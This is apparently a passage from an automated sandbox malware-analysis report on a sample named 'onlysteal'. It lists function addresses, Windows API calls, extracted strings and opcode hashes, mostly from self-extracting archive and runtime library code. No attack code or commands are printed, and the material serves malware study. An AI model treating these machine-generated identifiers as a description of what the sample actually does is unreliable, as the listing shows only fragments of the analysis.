                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 531ee01226c3811602914b524bf6ea0346ec8606f42420ecd87059c11cc2a5bd
                                      • Instruction ID: 11a8f24a86f73f56e7ffe8b8f1da6ee7a2edff74c75493c1f8fa099501007d6f
                                      • Opcode Fuzzy Hash: 531ee01226c3811602914b524bf6ea0346ec8606f42420ecd87059c11cc2a5bd
                                      • Instruction Fuzzy Hash: F8311875118346ABC704DFA8D88499BB7F8BF98714F008A1EF999C3210E770D559CBA6
                                      Function 00252AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00252AF1,002502FC,0024FA34), ref: 00252B08
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00252B16
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00252B2F
                                      • SetLastError.KERNEL32(00000000,00252AF1,002502FC,0024FA34), ref: 00252B81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: ce47a7be81e982a7c737e2476036cf6fc05f57317f6bbd1be90bc35ac6585faf
                                      • Instruction ID: 26f13edc718495fff3f96415f8123283fc10e1d2a2d066b8a66f641bd7c0a6f8
                                      • Opcode Fuzzy Hash: ce47a7be81e982a7c737e2476036cf6fc05f57317f6bbd1be90bc35ac6585faf
                                      • Instruction Fuzzy Hash: BE012836139312ADAA162E747C49A2A2B64EF127BB7205339FD10510E0FFB15C2C550C
                                      Function 002597E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                      • _free.LIBCMT ref: 0025981C
                                      • _free.LIBCMT ref: 00259844
                                      • SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 00259851
                                      • SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                      • _abort.LIBCMT ref: 00259863
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: a73ae4722963dccfb4cec923c6af2ffc1310fb5a10dac1e8320831524d5486c0
                                      • Instruction ID: 52ed0e5fa8441e59fef355c7217636374eec4910a0eb939251a24ab669ffde18
                                      • Opcode Fuzzy Hash: a73ae4722963dccfb4cec923c6af2ffc1310fb5a10dac1e8320831524d5486c0
                                      • Instruction Fuzzy Hash: DAF0A935175602B6CA1277347C0EA2B1AA58FD2763F254134FE14A6192EFB0CC6D495D
                                      Function 0024DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0024DC47
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024DC61
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024DC72
                                      • TranslateMessage.USER32(?), ref: 0024DC7C
                                      • DispatchMessageW.USER32(?), ref: 0024DC86
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0024DC91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 76ae1bfa3df462ba4b0535978a184d9772116696aebe3fc7eb09545d2e8e5fc6
                                      • Instruction ID: 2d538f6321c3dda59ad2813eb29342a26f3ef0965b299db19d8e31b64fe1a136
                                      • Opcode Fuzzy Hash: 76ae1bfa3df462ba4b0535978a184d9772116696aebe3fc7eb09545d2e8e5fc6
                                      • Instruction Fuzzy Hash: 66F0FF72A01219BBCB20AFA5ED4DDDF7F7DEF42791B004012F50AD2061D675D65AC7A0
                                      Function 0024A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0024A699: GetDC.USER32(00000000), ref: 0024A69D
                                        • Part of subcall function 0024A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0024A6A8
                                        • Part of subcall function 0024A699: ReleaseDC.USER32(00000000,00000000), ref: 0024A6B3
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0024A83C
                                        • Part of subcall function 0024AAC9: GetDC.USER32(00000000), ref: 0024AAD2
                                        • Part of subcall function 0024AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0024AB01
                                        • Part of subcall function 0024AAC9: ReleaseDC.USER32(00000000,?), ref: 0024AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: "$$($A$
                                      • API String ID: 1061551593-3683093551
                                      • Opcode ID: 452a4b6cef098294368606d60593222db992714918d47b0778c4ccccc352774b
                                      • Instruction ID: 2bb109d6210d8c03235c90c4e64dcf2a3a4c3b37f49585ba2872e954c8111b3f
                                      • Opcode Fuzzy Hash: 452a4b6cef098294368606d60593222db992714918d47b0778c4ccccc352774b
                                      • Instruction Fuzzy Hash: 2A91FF71218355AFD724DF25D858A2BBBF8FF89700F00491EF99AD3220DB70A945CB62
                                      Function 0023C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 0023B92D: _wcsrchr.LIBVCRUNTIME ref: 0023B944
                                      • _wcslen.LIBCMT ref: 0023C197
                                      • _wcslen.LIBCMT ref: 0023C1DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsrchr
                                      • String ID: .exe$.rar$.sfx
                                      • API String ID: 3513545583-31770016
                                      • Opcode ID: cf7bcaa42889285238322c665515b3a43448008705d4a64e2c88d92c489b1c6f
                                      • Instruction ID: 4cd7839b5166f1a5e8f13ae154792494051419b68fb7fa881ba5928182d7b665
                                      • Opcode Fuzzy Hash: cf7bcaa42889285238322c665515b3a43448008705d4a64e2c88d92c489b1c6f
                                      • Instruction Fuzzy Hash: 104135A653035295C73AAF748842A3BB3A8EF41744F30090EF9D67B081EB605DF1D795
                                      Function 0023BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0023BB27
                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0023A275,?,?,00000800,?,0023A23A,?,0023755C), ref: 0023BBC5
                                      • _wcslen.LIBCMT ref: 0023BC3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CurrentDirectory
                                      • String ID: UNC$\\?\
                                      • API String ID: 3341907918-253988292
                                      • Opcode ID: 459320c15e09f424490edf9f541043b8a550f7e6413adc1ffd36d4098eb5cb88
                                      • Instruction ID: 0135eba0a70fe1334bf1dce84074eb46a39149137f91b06da5a388ae2ad1b547
                                      • Opcode Fuzzy Hash: 459320c15e09f424490edf9f541043b8a550f7e6413adc1ffd36d4098eb5cb88
                                      • Instruction Fuzzy Hash: 0D4164B1460216AACF32AF60CC41EEA77A9AF45394F108866FA55A3151DB709AB08E50
                                      Function 0024CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 0024CD84
                                        • Part of subcall function 0024AF98: _wcschr.LIBVCRUNTIME ref: 0024B033
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr$CompareString
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 69343711-3358265660
                                      • Opcode ID: cb936410b27a2203f438538d962cd049bafa974c3a0bbd333eec830d8dce7c6e
                                      • Instruction ID: 8a126f4a47415a20d5360bd4efe20f1d8f65361822e0e46ef89d17a16e1dbe17
                                      • Opcode Fuzzy Hash: cb936410b27a2203f438538d962cd049bafa974c3a0bbd333eec830d8dce7c6e
                                      • Instruction Fuzzy Hash: C6319671A2021A9ADF29CF54CC41EEE77BCEB15350F5045A6F905E7180EBB0DEA48FA1
                                      Function 0023B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 0023B9B8
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • _wcschr.LIBVCRUNTIME ref: 0023B9D6
                                      • _wcschr.LIBVCRUNTIME ref: 0023B9E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 71063848135e4a9cce25befe45bc250203250c8530c08081af86ede8262a3e61
                                      • Instruction ID: 9278c61b08bf4d6fe6d5d94cdbe697d5709e650fce2d5f11ed28a23cf7c306d0
                                      • Opcode Fuzzy Hash: 71063848135e4a9cce25befe45bc250203250c8530c08081af86ede8262a3e61
                                      • Instruction Fuzzy Hash: 6A0149A3530312799631AF358C46D2BA3ACEE92371F40440AFA44D7082EB30D87986B1
                                      Function 0024B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024B2BE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0024B2D6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 0024B304
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1$xz(
                                      • API String ID: 445417207-642738945
                                      • Opcode ID: 0f0595681d82c674b825c4de5ad324f9bb8168cd77c60f3f448742ad73f1e139
                                      • Instruction ID: bbbb338e5d01ca43135442171f3ffe09406e6d7cd4f890915b7402feca90e360
                                      • Opcode Fuzzy Hash: 0f0595681d82c674b825c4de5ad324f9bb8168cd77c60f3f448742ad73f1e139
                                      • Instruction Fuzzy Hash: 4711E132920119B6DB26DE74AD4DFFF3B6CEB09700F000061FA45B2080C7E0DA619B61
                                      Function 0024B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 0024B6ED
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0024B712
                                      • DeleteObject.GDI32(00000000), ref: 0024B744
                                      • DeleteObject.GDI32(00000000), ref: 0024B767
                                        • Part of subcall function 0024A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0024B73D,00000066), ref: 0024A6D5
                                        • Part of subcall function 0024A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A6EC
                                        • Part of subcall function 0024A6C2: LoadResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A703
                                        • Part of subcall function 0024A6C2: LockResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A712
                                        • Part of subcall function 0024A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0024B73D,00000066), ref: 0024A72D
                                        • Part of subcall function 0024A6C2: GlobalLock.KERNEL32(00000000), ref: 0024A73E
                                        • Part of subcall function 0024A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0024A762
                                        • Part of subcall function 0024A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0024A7A7
                                        • Part of subcall function 0024A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0024A7C6
                                        • Part of subcall function 0024A6C2: GlobalFree.KERNEL32(00000000), ref: 0024A7CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                      • String ID: ]
                                      • API String ID: 1797374341-3352871620
                                      • Opcode ID: 44d51a704c1ef4e6747942aa4b0bfaecf77ae2f369d67830dffa81244c0c8786
                                      • Instruction ID: 124b3ce166c6b09971a74929357f191ab806fcbb97987c0556cb9a56ab57f6b7
                                      • Opcode Fuzzy Hash: 44d51a704c1ef4e6747942aa4b0bfaecf77ae2f369d67830dffa81244c0c8786
                                      • Instruction Fuzzy Hash: 7A01D63795010267C716BB745C0EA7FBA7D9FC0752F050111F900A7295DF61CD254A61
                                      Function 0024D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024D64B
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0024D661
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0024D675
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 0024D684
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: fc06075d4dc5d0d209183cf22b0ec240e97876c9af110b48948a8cafa4f6e326
                                      • Instruction ID: f30feb56c42cb96a8c24415a78568e0114566698fb0e8a0333f8d3dfc68c8778
                                      • Opcode Fuzzy Hash: fc06075d4dc5d0d209183cf22b0ec240e97876c9af110b48948a8cafa4f6e326
                                      • Instruction Fuzzy Hash: 78014C332A5311BBD2148F64BE0DF57776CEB5AB01F020012F309A20D4C7A2AA348B79
                                      Function 00257E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00257E24,00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002), ref: 00257E93
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00257EA6
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00257E24,00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002), ref: 00257EC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4b26c6e230a8845c4a03155c49540f9387b3b0755abf898f36a6e015d5409c77
                                      • Instruction ID: c96cb0fea388c87e4a1237fc7104349c7e58c4ef9f511e8da1abeb8cb08adbd9
                                      • Opcode Fuzzy Hash: 4b26c6e230a8845c4a03155c49540f9387b3b0755abf898f36a6e015d5409c77
                                      • Instruction Fuzzy Hash: 69F06831954209BBCB12DFA4EC0DB9EBFB9EF44716F0081A9FC05A2150DB709E54CA94
                                      Function 0023F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4
                                      • GetProcAddress.KERNEL32(002781C8,CryptUnprotectMemory), ref: 0023F2F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: 506cf63e5287d55346bc29d02f2c848cc5e010c3c3ce6948662e31ee17dc8037
                                      • Instruction ID: d7ec9d3c1582af7c632fb10ac60a1dd39dbd365e2d6b2717fa37c5d252d945d3
                                      • Opcode Fuzzy Hash: 506cf63e5287d55346bc29d02f2c848cc5e010c3c3ce6948662e31ee17dc8037
                                      • Instruction Fuzzy Hash: 1AE08670D347429EC721DF74A94DB027AD46F15700F14C85DF0DA93680DBB4D9E08B50
                                      Function 00252BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
